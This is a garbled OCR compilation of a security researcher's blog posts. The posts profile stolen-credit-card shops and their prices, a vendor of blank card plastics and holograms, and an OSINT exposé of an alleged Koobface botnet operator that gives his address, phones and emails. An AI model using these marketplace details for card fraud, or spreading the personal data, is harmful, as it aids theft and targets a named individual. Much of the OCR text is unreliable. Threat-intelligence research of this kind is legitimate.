allfresh.us - 46.21.144.115 - Name server: 
YNSl.YAHOO.COM - Email: keikomiyahara@yahoo.com - 
AS35017, 

SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 

_Approven.su 

Approven.su is a relatively more advanced DIY shop for 
purchasing of stolen credit card details, due to to its 
advanced search options, allowing cybercriminals an easier 




way for searching into the the dumps/full dumps of stolen 
credit 

card details. 

The most recent annoucement at Approven.su says " Sumer 
Jam: 8 new bases - Georgia2, California3, Pennsyl-vania3, 
Puerto Rico, California4, Texas4, Virginia, California5". 

The price for a stolen credit card is $10, with Platinum cards 
going for $15. 
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Scorch criteria: 


crderE 


($) billing 


checker ^st/cgot 


Site will go down for an update in 15 mins. It should be done in an hour. 

I'n imc( 0 Discount OS Logout 


Tfc* cart II carrendv ««OtV 


04NIS) 


Country Any 

- Bonk Any 

Service 

Any 

* Lost 4/5 

Bose Ary »| 

code 



■irilrf, -1 l 'i - Y‘i r* 

Type 

Any 

• Subtype Any 

- Type Ary 


March fdtm 


uan toatjMi tha state nh ais duapi 
9 ham a n pa > da a — to you paatly M 


Track I DoosnT manor 

Search 

Refresh the page for a random selection of bins ALL SEARCHES FREE FOR STORE OPENING 


BIN 

»?»• 

Code 

C«wun 

Busk 

QiimIp 

Price 

Bite 

Can 

*2074? 

MSA DEBIT 
CLASSIC 

101 

Urated Suies 

JPMOftGAN CHASE BANK S A. - DEBIT 

662 

I0S 

Nr»_Vork 

rra 

406515 

MSA DEBTT 
CLASSIC 

toi 

Urated Suits 

NAVY FEDERAL CREDIT UNION 

411 

tOS 

OfOtpM 

r m 
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TjJ o-ders 


©tilths 


^ cheeper Q sudddrt 


- 

. 

413 Tt« 

MSA 

CLA 

Site will go down for an update in 15 mint. It ibould be done in an hour. 


l M 

' — 

434256 

MSA 

CLA 


UtemaoK 

Balance 0 D»v:«ori OS logout 




i i~n 

— 

_ 

421745 

MSA Dlb&f 
PLATINUM 

101 

cwrremfv •"pty 

Urate 4 States 

BANK OF AMERICA 

221 


Catfonu.v 

□3 


427314 

MSA DEBIT 
CLASSIC 

toi 

Urated States 

BANK OF OKLAHOMA 

211 

tos 

Geoffu2 

1 l»«| 

1 — 

. 

461046 

MSA DEBIT 
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Domain reconnaissance 

approven.su - 91.229.248.20 - Name server: 
dnsl.naunet.ru - Email: yurtan20@el.ru - HOSTED IN 
UKRAINE 

BestDumps.biz 

BestDumps.biz doesn't allow newly registered visitors the 
opportunity to search across its database of stolen credit card 
details, unless they pay $50 using Liberty Reserve. 
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BES TDUM 

LOGIN 

Username 

Password 



To register please write to 
bdsupport@jabber.org or 655584 



I 

I7UTVTP 

Welcome 



Current balance: 
Shopping Carl: $0 
i Total cards: 0 

A 

News 

Dump* & Offers 

ri Cart CD Order* 

Add funds 

*8* Support 

A Profile ® Log Out 


Validation 

You are seconds away to have full access to this site. 

Before any further use of this site you must pay $ 50 . This amount will be automatically be 
verified and added to your balance! 

Notes: 

a If your accunt is not activated within 24 hours, your account will be removed, 
a if th« amount sent it different than $50 your account will not be activated. 


Activate Accou 

Iniwnal I Drr.lvlul limUr On 



Liberty 
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Domain reconnaissance 

bestdumps.biz - 195.3.145.87 - Name server: 

NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - 
AS50244 - 

HOSTED IN LATVIA, Associated email: bdsupport@jabber.org, 
Associated ICQ: 655584 





Bulba.cc 


Bulba.cc offers a Checker for stolen credit cards. 

The most recent announcement is "UPDATEADDED 1000 

MEXICO RARE! FRESH! 95 % VALID!!! Hurry up to load the 
account. 

The service advertised itself as follows: 

11 Hello my name is Bulba. I am official reseller of 
TRACK2.NAME service. Bulba.cc opened because 
track2.name dosed registration and don't accept new 
customers. We don't have any specific rules. Our only rule is 
"we don't replace bad dumps". That means we don't replace 
them at all and we don't have replacement policy. Don't ask 
about it in any case! 

We accept Libery Reserve, WU, MG, Bank Transfer (NEW) 
without any fees. Minimum for payment by LR -10 

$, WU, MG - 500 $, Bank Transfer - 500 $. Also we give 10 % 
bonus of money to all purchases. 

Our bases: SALES - track2, 50 % valid, alot dumps! Very 
cheap $7 per one! DATABASE9 - TRACK1 +TRACK2(90 

%) + TRACK2(10 %) only! 80 % valid, FRESH. NEW 
DATABASE, TRACK 2 only, 95 % valid, FRESH! NEW !" 
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Domain reconnaissance 

bulba.cc - 91.223.77.254 - Name server: 
NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, 
UKRTELNET 

JSC UKRTELECOM - HOSTED IN UKRAINE 

_CardShop.bz 

CardShop.bz is yet another DIY interface for purchasing 
stolen credit cards data (dumps/full dumps). The general 
rules of the site are as follows: 

2.1.1) AH calculations on a site and its services - automatic 

2.1.2) Minimum funding amount on a site 10 $ that equals to 
50 credits 
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2.1.3) Period of validity of credits is 1 month (under the 
additional oral agreement term can be increased). In a case 
if you had not time to spend all credits, it is possible to make 
fund of your account and credits will automatically be 
restored 

2.1.4) Refund for not used credits - IS NOT POSSIBLE 

In order to avoid conflict situations, please check information 
that you need before funding account 

The Rules of service ONLINE sale CC/DUMPS reads: 

"2.2) Rules of service ONLINE sale CC/DUMPS 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked before purchase and have status VALID - 

IS NOT POSSIBLE 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked in 1 hour after purchase through the link 

'Check' and having status VALID - IS NOT POSSIBLE 

2.2.2) Return of credits for purchased invalid CC/Dumps 
(DECLINE/HOLD CALL/PICKUP) which are not checked before 

purchase, is possible only within 24 hours after the order. 
After 24 hours any claims on return of credits are not 
accepted 

2.2.3) You will not be charged for invalid CC/Dumps if you 
checked it instant or in 1 hour and credits will be refunded 
automatically. You will be charged only for CC/Dumps 
checking even if CC/Dumps is invalid 

2.2.4) We do not guarantee limits and amounts on CC/Dumps 



2.3) Rules of service ONLINE Check CC/Dumps 

2.3.1) Status Valid, means that at the moment of check 
CC/Dump was Approved 

2.3.2) Status Declined, means that at the moment of check 
CC/Dump was Decline/Pickup/Hold Call 

2.3.3) Claims on checked DUMP/CC are not accepted. 

2.7) Rules of other services on site CardShop will be added in 
this agreement later 

3) Prices and Tariffs 

3.1.1) 1 credit is accepted to a unit of account on site 
CardShop. Initially 1 credit = 1 $. The price for 1 credit can 
change according to tariffs for funding. Tariffs could be found 
in Tariff section at site 

3.1.2) Administration CardShop reserves the right to itself at 
any moment to change tariffs. You agree periodically check 
tariffs on site CardShop to learn about possible changes in 
them" 

The is currently offering 33903 U.S based stolen credit cards 
for sale. The web site is also offering Proxies for 

sale - compromised malware infected hosts- where the price 
is 0.3 $ per proxy. Next to the inventory of stolen credit cards 
and the proxy service, the web site is also offering batch 
checking for the validity of the stolen credit cards, and is also 
performing Lookups SSN|MMN services, with the ability to 
Lookup MMN in California state. 

250 




Domain reconnaissance 
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cardshop.bz - 217.23.9.67 - Name server: nsl.servicedns.nl 

- Email: contact@privacyprotect.org; AS49981, WorldStream; 
HOSTED IN THE NETHERLANDS 

_CcMall.cc 

CcMall.cc is associated with the following ICQ number 
777605, where potential buyers would have to connect with 
the seller in order to be offered the ability to register in the 
site. 11 For private limited registration only into the new shop" 
is currently displayed on CcMall.cc's web site. 

Domain reconnaissance 

ccmall.cc - 213.5.70.34 - Name server: TRl.ONLINESHOP.SU 

- Email: gwylhcfktm@whoisservices.cn - AS49544, 

INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS; Name 
server: trl.onlineshop.su - Emaill: exchangers@msn.com 
context.cx is also registered using exchangers@msn.com. 

_ccStore.ru 

ccStore.ru is associated with the following ICQ - 20606, and 
requires that a valid email address is supplied in order to 
activate the access to yet another interface for selling and 
reselling fraudulently obtained financial data. 
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Domain reconnaissance 

ccStore.ru - 91.220.101.200 - Name server: 
nsl.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - 
HOSTED IN 

THE NETHERLANDS 

_Cv2Shop.com 

Cv2Shop.com has an inventory of 734 U.S based stolen 
credit cards for the price of Discovery - $2.2 per piece; Amex 
for $2; Mastercard for $2; Visa for $1.7 per piece. The 
fraudulent interface is also offering 80 Canadian stolen credit 
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cards for the price of $7 per piece for Discovery and Amex, 
and for $6 for Mastercard and $5 for Visa. 

Domain reconnaissance 

cv2shop.com 


72.20.12.205 


Name 


server: 

DNS1.NAME-SERVICES.COM 

Email: 

wn- 

fxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS- 
COMM - HOSTED IN THE UNITED STATES 

Freshstock.biz 
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FreshStock.biz is associated with the following ICQ - 
607373112 where users have to initiate the contact in order 
to 

obtain access to the DIY shop for stolen credit cards.. 

Domain reconnaissance 
freshstock.biz - 38.97.225.166; 

69.175.73.184 - Name server-NSl.PIPEDNS.COM Email: 
ghmbfvn- 

txs@whoisprivacyprotect.com - AS32475, SINGLEHOP , Inc. - 
HOSTED IN THE UNITED STATES 


Magic-Numbers, cc 


Magic-Numbers.cc is associated with the following ICQ - 
333277 and Jabber: elche@jabber.org where users wanting 

bulk orders have to contact the cybercriminals offering the 
DIY interface for stolen credit card numbers. 

The web site is currently offering 24642 U.S based stolen 
credit cards, followed by another 1545 Israeli based 

credit cards, with a total dumps currently being offered at 
43,507. The most recent advertisements read: 11 Australia 
base, ultra virgin fresh base - track2 available. Approval rate 
85 %" 
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Domain reconnaissance 
magic-numbers.cc - 91.213.175.89; 
91.223.77.35 Name server: 

NS1.1000DNS.NET- Email: 
con- 

tact@privacyprotect.org - AS6849, UKRTELNET JSC 
UKRTELECOM - HOSTED IN UKRAINE 


Mega4u.biz 
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mega4u.biz is currently closed for free registration. 

Domain reconnaissance 

mega4u.biz - 178.162.174.71 - Name server: 
NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, 
LEASEWEB-DE 

- HOSTED IN GERMANY 

_MyCc.su 

MyCc.su is associated with the following ICQ - 40040000 and 
next to offering stolen credit cards for sale, is also 

soliciting for security vulnerabilities - 11 Found a bug? We will 
pay !". The latest update from September 29 says that 1500 
EU based stolen credit cards have been added, followed by 
another update from the same date, this time with 

300 French based stolen credit cards added. 

The price of the stolen credit cards varies between $2 and $5 
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Domain reconnaissance 
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mycc.su - 188.93.17.180 - Name server: 
nsl.deltahost.com.ua - Email: admin@mycc.su - AS49505, 
SELECTEL Ltd. - 

HOSTED IN RUSSIA 

_Perfect-Numbers.cc 

Perfect-Numbers.cc is yet another DIY interface for 
purchasing stolen credit cards. It's associated with teh 
following ICQ - 605099359. Users are able to search within 
the interface only after they have refilled their balance using 
Liberty Reserve as a means for payment. 

Domain reconnaissance 
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perfect-numbers.cc - 91.220.101.75 - Name server: 
NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko 
Sergey 

Nikolaevich; icq: 605099359 - HOSTED IN THE 
NETHERLANDS 

Privateservices.ws 

privateservices.ws currently has a database of 634 U.K based 
stolen credit cards, and another 293 French based 


stolen credit cards. 
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Domain reconnaissance 

privateservices.ws - 217.23.9.92 - Name server: 
nsl.servicedns.nl - AS49981, WorldStream AS Maasdijk - 
HOSTED IN 

THE NETHERLANDS 

_pwnshop.cc 

pwnshop.cc is yet another DIY interface for selling stolen 
credit card numbers. The web site is currently returning the 
following message: " You can obtain registration code only 
from exist clients.Please be aware of scam - registration code 
is free for exist clients, so if you pay for it - as for refund. " 
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Domain reconnaissance 

pwnshop.cc - 77.79.13.209 - Name server: 
NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN 
LITHUANIA 


TrackStore.su 


trackstore.su is offering existing clients to option to refer 
additional customers for the price of $20 each. The web site 
is currently offering 1648 U.S based stolen credit cards, 
exclusively from the Suntrust Bank for the price of $10 
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for each stolen credit card. 
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Domain reconnaissance 
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trackstore.su - 46.21.148.26 - Email: 

roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN 
THE NETHER¬ 
LANDS 

_Track2.name 

track2.name is offering stolen credit card numbers for the 
price of $20 for each stolen credit card. 
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Domain reconnaissance 

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC 
UKRTELECOM - HOSTED IN UKRAINE 

vzone.tc 

vzone.tc is yet another DIY shop for stolen credid card 
numbers. The current announcement reads : " Dear users, 
after you buy cards, to view proper information, please dick 
download all cards or download selected card from My Cards 
page. It will show you all information like Last Name and all 
the additional info like phone, email. 

P.S If you dislike new shop V.2 of our shop, then please use 
support link and send us your feedback to admin, 

if you want to back old shop V.l then send feedback with 
proper reasons why u again want to see old shop V.l" 

The current price for a stolen credit card is $1.80 for every 
card. Next to offering stolen credit cards as a ser¬ 
vice, the shop is also offering SSN and DOB Searcher, next to 
the opportunity for customers of the shop to also 

purchase proxies - compromised malware infected hosts. 
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Domain reconnaissance 
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vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - 
Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C 

SAKURA Internet - HOSTED IN JAPAN 

_DumpsSheck.com 

dumpscheck.com is associated wit the following ICQ - 
612303315 is an advanced checker for the validity of stolen 

credit card details. The web site says 11 Current merchant 
accepts VISA, MASTERCARD, AMEX, DISCOVER, DINERS, 

JCB. " 
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Domain reconnaissance 

dumpscheck.com - 206.217.196.47 - Name server: 
NS1.DUMPSCHECK.COM - Icq 612303315; AS4436, NLAYER 

Communications, Inc. - HOSTED IN THE UNITED STATES 

Related posts on the economics of cybercrime: 


[7] New report details the prices within the 
cybercrime market 

[ 8 ] CardCops: Stolen credit card details getting 
cheaper 

[9] Microsoft study debunks profitability of the 
underground economy 

[10] Are Stolen Credit Card Details Getting Cheaper? 

[11] Squeezing the Cybercrime Ecosystem in 2009 

[12] Price Discrimination in the Market for Stolen 
Credit Cards 

[13] The Underground Economy's Supply of Goods 

[14] Microsoft study debunks phishing profitability 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/cardcoos-stolen- 
credit-card-details- a ettin a -cheaoer/2084 

2. http://ddanchev.blo as pot.com/2QQ8/Q7/are-stolen-credit- 
card-details- a ettin a .html 

3. http://ddanchev.blo as pot.com/2008/Q6/orice- 
d i sc ri m ination-m-ma rket°f o r. h t m I 

272 

4. http://www.zdnet.com/blo a /securitv/scammers-introduce- 
atm-skimmers-with-built-in-sms-notification/2Q00 























5. http://ddanchev.blo as pot.com/2010/07/cvbercriiminais-sa l- 
ini ect-cvbercrime.html 

6. http://ddanchev.blo as pot.com/2008/06/orice- 
discrimination-in-market-for.html 

7. http://www.zdnet.com/blo a /securitv/new-reoort-details- 
the-prices-within-the-cvbercrime-market/8078 

8. http://www.zdnet.com/blo a /securitv/cardcops-stolen- 
credit-card-details- a ettin a -cheaoer/2084 

9. http://www.zdnet.com/blo a /securitv/microsoft-stud v- 
debunks-profitabiliitv-of-the-under a round-economv/3522 

10. http://ddanchev.blo as pot.com/2008/Q7/are-stolen-credit- 
card-details- a ettin a .html 

11. http://ddanchev.blo as pot.com/20Q9/01/saueezin a- 
c vbecrime-ecosvstem-in-2009.html 

12. http://ddanchev.blo as pot.com/2008/06/orice- 
discrimination-in-market-for.html 


13. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

14. http://www.zdnet.com/blo a /securitv/microsoft-stud v- 
debunks-phishin a- profitabilitv/2366 

15. http://ddanchev.blo as pot.com/ 

16. http://twitter.com/danchodanchev 
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Summarizing ZDNet's Zero Day Posts for October 
( 2011 - 12-04 21 : 05 ) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for October. You can subscribe to my 

[l]personal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]iPhone 5 themed emails serve Windows 
malware 

02 . [ 4]27 of 100 tested Chrome extensions contain 51 
vulnerabilities 

03 . [ 5]37 percent of users browsing the Web with 
insecure Java versions 

04. [6]Google introduces Safe Browsing Alerts for 
network administrators 

05. [7]Malware Watch: U.S Chamber of Commerce 
official letter; DHL delivery error, IRS notifications 

275 

06. [8]'Steve jobs Alive!' emails lead to exploits and 
malware 

07. [9]Which is the most popular malware propagation 
tactic? 


08. [10]Spamvertised 'Cancellation of the package 
delivery' emails serving malware 

09. [ll]Hacking group from Nepal posts 10,000 stolen 
Facebook accounts online 

10. [12]Over a million web sites affected in mass SQL 
injection attack 

11. [13]New Mac OS X malware disables Apple's 
malware protection 

12. [14]New Mac OS X malware with DDoS 
functionality spotted in the wild 

13. [15]Security researcher finds major security flaw 
in Facebook 

This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17Jon Twitter. 

1. http://www.zdnet.com/toDics/dancho+danchev? 
Q-i&mQde=rss&ta q = mantle skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securit v/i phQne-5-themed- 
emails-serve-windows-mal ware/9534 

4. http://www.zdnet.com/blo a /securitv/27-of-10Q-tested- 
chrome-extensions-contain-51-vulnerabilities/9537 

5. http://www.zdnet.com/blo a /securitv/37-percent-of-users- 
browsin a -the-web-with-insecure- i ava-versions/9541 

6. http://www.zdnet.com/blo a /securit v/a oo a le-introduces- 
safe-browsin a -alerts-for-network-administrators/9569 




























7. http://www.zdnet.com/blo a /securitv/malware-watch-us- 
chamber-of-commerce-official-letter-dhl-deliverv-erro 

r-irs-notifications/9572 

8. http://www.zdnet.com/blo a /securitv/steve- i obs-alive- 
emaiis-lead-to-exploits-and-mal ware/9587 

9. http://www.zdnet.com/blo a /securitv/which-is-the-most- 
po pular-malware-pro paa ation-tactic/9638 

10. http://www.zdnet.com/blo a /securit v/s pamvertised- 
cancellation-of-the-packa a e-deliverv-emails-servin a -malwa 

re/9654 

11. http://www.zdnet.com/blo a /securitv/hackin a-a roup-from- 
nepal-posts-10000-stolen-facebook-accounts-online/9 

658 


12. http://www.zdnet.com/blo a /securitv/over-a-million-web- 
sites-affected-in-mass-sal-in i ection-attack/9662 

13. http://www.zdnet.com/blo a /securitv/new-mac-os-x- 
malware-disables-a p ples-mai ware-protection/9665 

14. http://www.zdnet.com/blo a /securitv/new-mac-os-x- 
malware-with-ddos-funct i onalit v-s potted-in-the-wild/9701 

15. http://www.zdnet.com/blo a /securitv/securitv-researcher- 
finds-ma i or-securitv-flaw-in-facebook/9704 

16. http://ddanchev.blo as pot.com/ 

17. http://twitter.com/danchodanchev 
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Summarizing ZDNet's Zero Day Posts for November 
( 2012 - 01-01 20 : 59 ) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for November. You can subscribe to my 

[ljpersonal RSS feed , [2]Zero Day's main feed , or 

follow me on Twitter: 

01. [3]Massive DNS poisoning attack in Brazil serving 
exploits and malware 

02. [4]South Korea to block port 25 as anti-spam 
countermeasure 

03. [5]Researchers spot malware using a stolen 
government certificate 

04. [6]SCADA systems at the Water utilities in Illinois, 
Houston, hacked 

05. [7]New Facebook worm spreading 


06. [8]Popular free antivirus apps for Android fail anti¬ 
malware tests 
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This post has been reproduced from [9]Dancho 
Danchev's blog. Follow him [10]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev? 
o=l&mode=rss&ta a = mantle_skin : content 

2. http://feeds.feedbumer.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/massive-dns- 
poisonin a -attack-in-brazil-servin a -exploits-and-mal ware/97 
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4. http://www.zdnet.com/blo a /securitv/south-korea-to-block- 
oort-25-as-anti-soam-countermeasu re/9789 

5. http://www.zdnet.com/blo a /securitv/researchers-soot- 
malware-usin a -a-stolen- a overnment-certificate/9813 

6. http://www.zdnet.com/blo a /securitv/scada-svstems-at-the- 
water-utilities-in-illinois-houston-hacked/9821 

7. http://www.zdnet.com/blo a /securitv/new-facebook-worm- 
s preadin a /9825 

8. http://www.zdnet.com/blo a /securit v/po pular-free-antivirus- 
ap ps-for-android-fail-anti-mal ware-tests/9830 

9. http://ddanchev.blo as pot.com/ 

10. http://twitter.com/danchodanchev 
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Summarizing ZDNet's Zero Day Posts for December 
( 2012 - 01-01 21 : 02 ) 

The following is a brief summary of all of my posts at ZDNet' 
Zero Day for December. You can subscribe to my 

[l]personal RSS feed , [2]Zero Day's main feed , or 

follow me on Twitter: 

01. [3]New study claims that Chrome is the most 
secure browser 

02. [4]FTC issues refunds to scareware victims 

03. [5]Yahoo! Mail introduces two factor 
authentication 

04. [6]Web malware exploitation kits updated with 
new Java exploit 

05. [7]Cybercriminals exploiting the death of Kim 
Jong-ll 
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06. [8]Localized ransomware variants impersonate 
law enforcement agencies 

07. [9]Cybercriminals hijack Facebook accounts 
through bogus browser extensions 

08. [10]Amnesty International UK compromised, 
serving exploits and malware 


This post has been reproduced from [ll]Dancho 
Danchev's blog. Follow him [12]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev? 
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9. http://www.zdnet.com/blo a /securit v/c vbercriminais-h ; ack- 
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ns/9858 
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12. http://twitter.com/danchodanchev 



























































282 


Profiling a Vendor of Visa/Mastercard Plastics and 
Holograms (2012-01-03 20:04) 

What is it that cybercriminals needs once they have obtained 
access to [l]stolen financial data? Next to [2]money 
mules, that's empty plastic cards in which they will later on 
embed the stolen financial data. 

Let's profile a vendor of empty Visa/Mastercard plastic cards 
and holograms in order to gain a better picture 

at just how easy it is to obtain such plastic cards. 

Associated nickname: pizzA 

Associated ICQ: 496 872 531 

Associated email: plastics@safe-mail.net 

Translated vendor's proposition: 

Below you have prices and samples of my products. 

Plastics - Blanks: 

1-50 = 15each 

51-100 = 14 each 

101+ = 13 each 

201+ = 12 each 

Plastics - Embossed 

1 and up = 20each 



101 + = 18each 


201+ = 17 each 
Minimum order: 200USD 

Shipping to: USA, International orders(min $800 + shipping) 
Plastics have UV Security print on Front and Back. 
Holograms Stickers and Heat press: 

VISA - Silver/Gold 

VISA mini - Silver/Gold 

MasterCard - Silver/Gold 

Minimum order on stickers: 500pcs 

Minimum order on Heatpress: lOOOpcs 

$0.8 per hologram 

PAYMENT: 

Liberty Reserve (Prefered) 

Western Union (500usd minimum + 8 % WU fee) 

RULES: 

- Any order, question feel free to ask in ICQ. 

- Shipping time 24-48 after the money is picked up. 

- PLEASE USE THIS TOPIC ONLY FOR FEEDBACK, ANY 
QUESTION AND ORDERS in ICQ. 



- If you buy from me it means you agreed my rules. 

Screenshots of his inventory of Visa and Mastercard plastics 
and holograms: 

283 

E 

284 

E 

285 

El 

286 

E 

287 

E 

288 

E 

289 

E 

290 

E 

291 

E 


292 


£ 

293 

E 

294 

E 

295 

El 

296 

E 

297 


E 

298 

E 

299 

E 

300 


E 
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Danchev's blog. Follow him [4]on Twitter. 

1. http://ddanchev.blo as pot.com/2Qll/10/exposin a -market- 
for-stolen-credit-cards.html 
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Profiling a Vendor of Visa/Mastercard Plastics and 
Holograms (2012-01-03 20:04) 

What is it that cybercriminals needs once they have obtained 
access to [l]stolen financial data? Next to [2]money 
mules, that's empty plastic cards in which they will later on 
embed the stolen financial data. 

Let's profile a vendor of empty Visa/Mastercard plastic cards 
and holograms in order to gain a better picture 

at just how easy it is to obtain such plastic cards. 

Associated nickname: pizzA 
Associated ICQ: 496 872 531 

Associated email: plastics@safe-mail.net 
Translated vendor's proposition: 

Below you have prices and samples of my products. 

Plastics - Blanks: 

1-50 = 15each 


51-100 = 14 each 














101 + = 13 each 


201+ = 12 each 
Plastics - Embossed 
1 and up = 20each 
101+ = 18each 
201+ = 17 each 
Minimum order: 200U5D 

Shipping to: USA, International orders(min $800 + shipping) 
Plastics have UV Security print on Front and Back. 
Holograms Stickers and Heat press: 

VISA - Silver/Gold 

VISA mini - Silver/Gold 

MasterCard - Silver/Gold 

Minimum order on stickers: 500pcs 

Minimum order on Heatpress: lOOOpcs 

$0.8 per hologram 

PAYMENT: 

Liberty Reserve (Prefered) 

Western Union (500usd minimum + 8 % WU fee) 


RULES: 



- Any order, question feel free to ask in ICQ. 

- Shipping time 24-48 after the money is picked up. 

- PLEASE USE THIS TOPIC ONLY FOR FEEDBACK, ANY 
QUESTION AND ORDERS in ICQ. 

- If you buy from me it means you agreed my rules. 

Screenshots of his inventory of Visa and Mastercard plastics 
and holograms: 
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This post has been reproduced from [3]Dancho Danchev's 
blog. Follow him [4]on Twitter. 
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Who's Behind the Koobface Botnet? - An OSINT 
Analysis (2012-01-09 16:59) 

It's full disclosure time. 

In this post, I will perform an OSINT analysis, exposing one of 
the key botnet masters behind the infamous 

Koobface botnet, that I have been [l]extensively profiling 
and infiltrating since day one. I will include photos of the 
botnet master, his telephone numbers, multiple email 
addresses, license plate for a BMW, and directly connect him 

with the infrastructure - now offline or migrated to a different 
place - of Koobface 1.0. 

























The analysis is based on a single mistake that the botnet 
master made - namely using his personal email for 

registering a domain parked within Koobface's command and 
control infrastructure, that at a particular moment in 

time was directly redirecting to the ubiquitous fake Youtube 
page pushed by the Koobface botnet. 

Let's start from the basics. Here's an excerpt from a 

[2]previous research conducted on the Koobface bot¬ 
net: 

However, what the Koobface gang did was to register a new 
domain and use it as Koobface C &C again parked 

at the same IP, which remains active - zaebalinax.com 
Email: krotreal@gmail.com - 78.110.175.15 - in particular 

zaebalinax.com/the/?pid=14010 which is [3]redirecting 
to the Koobface botnet. Two more domains were also 
registered and parked there, ul5jul .com and 
umidsummer .com - Email: 2009polevandrey@mail.ru 

which remain in stand by mode at least for the time being. 

The Koobface botnet master's biggest mistake is using the 
Koobface infrastructure for hosting a domain that was reg¬ 
istered with the botnet master's personal email address. In 
this case that zaebalinax.com and krotreal@gmail.com. 

zaebalinax.com is literally translated to 11 Gave up on 
Linux". UPDATED: Multiple readers have to contacted me to 
point out that zaebalinax is actually translated to 11 f*ckyou 
all" or 11 you ail are passing me off'. 



The same email krotreal@gmail.com was used to 

[4]advertise the sale of Egyptian Sphynx kittens on 

05.09.2007: 321 
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The following telephone belonging to Anton was provided - 
+ 79219910190 . The interesting part is that the same 

telephone was also used in [5]another advertisement, 
this time for the sale of a BMW: 

Photos of the BMW, offered for sale, by the same Anton that 
was using the Koobface infrastructure to host 

zaebalinax.com Email: krotreal@gmail.com: 
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License plane for Anton's newest BMW: 
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Upon further analysis, it becomes evident that his real name 

is Anton Nikolaevich Korotchenko (Ahtoh Hi/iKO/iaeBi/in 

KopoTHeHKo). Here are more details of this online activities: 

Real name: Anton Nikolaevich Korotchenko (Ahtoh 
H i/iKO/iaeBHH KopoTHeHKo) 

City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; 
Leningradskaya oblast,197343 

Associated phone numbers obtained through OSINT 
analysis, not whois records: 

+79219910190 

+380505450601 

050-545-06-01 

ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY) : 425099205053 
Twitter account: [6]@KrotReal; [7]@Real _Koobface 

Flickr account: [8]KrotReal 



Vkontakte.ru Account: [9]KrotReal; [10]tonystarx 

Foursquare Account: [ll]KrotReal 

Photos of Koobface botnet's master Anton Nikolaevich 
Korotchenko (Ahtoh Hi/iKO/iaeBi/in KopoTHeHKo): 
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Also, [12]a chat log from 2003, identifies KrotReal while 
he's using the following IP - krotreal@ip- 
534.dialup.cl. spb.ru 

[13] How do you trigger a change that would 
ultimately affect the entire cybercrime ecosystem? 
By person¬ 
alizing cybercrime. 

Go through previous research conducted on the 
Koobface botnet: 

[14] Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 

[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 









[16] Koobface Gang Responds to the "10 Things You Didn't 
Know About the Koobface Gang Post" 

[17] 10 things you didn't know about the Koobface gang 

[18] How the Koobface Gang Monetizes Mac OS X Traffic 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model 

[21] From the Koobface Gang with Scareware Serving 
Compromised Site 

[22] Koobface Botnet Starts Serving Client-Side Exploits 

[23] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[24] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[25] Koobface - Come Out, Come Out, Wherever You Are 

[26] Dissecting Koobface Worm's Twitter Campaign 

[27] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[28] Koobface Botnet Dissected in a TrendMicro Report 

[29] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[30] Movement on the Koobface Front - Part Two 

[31] Movement on the Koobface Front 

[32] Dissecting the Koobface Worm's December Campaign 



[33] The Koobface Gang Mixing Social Engineering Vectors 

[34] Dissecting the Latest Koobface Facebook Campaign 
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Who's Behind the Koobface Botnet? - An OSINT 
Analysis (2012-01-09 16:59) 

In this post, I will perform an OSINT analysis, exposing one of 
the key botnet masters behind the infamous Koobface 

botnet, that I have been [l]extensively profiling and 
infiltrating since day one. I will include photos of the botnet 
master, his telephone numbers, multiple email addresses, 
license plate for a BMW, and directly connect him with 

the infrastructure - now offline or migrated to a different 
place - of Koobface 1.0. 

The analysis is based on a single mistake that the botnet 
master made - namely using his personal email for 

registering a domain parked within Koobface's command and 
control infrastructure, that at a particular moment in 

time was directly redirecting to the ubiquitous fake Youtube 
page pushed by the Koobface botnet. 








Let's start from the basics. Here's an excerpt from a 

[2]previous research conducted on the Koobface bot¬ 
net: 

However, what the Koobface gang did was to register a new 
domain and use it as Koobface C &C again parked 

at the same IP, which remains active - zaebalinax.com 
Email: krotreal@gmail.com - 78.110.175.15 - in particular 

zaebalinax.com/the/?pid=14010 which is [3]redirecting 
to the Koobface botnet. Two more domains were also 
registered and parked there, ul5jul .com and 
umidsummer .com - Email: 2009polevandrey@mail.ru 

which remain in stand by mode at least for the time being. 

The Koobface botnet master's biggest mistake is using the 
Koobface infrastructure for hosting a domain that was reg¬ 
istered with the botnet master's personal email address. In 
this case that zaebalinax.com and krotreal@gmail.com. 

zaebalinax.com is literally translated to 11 Gave up on 
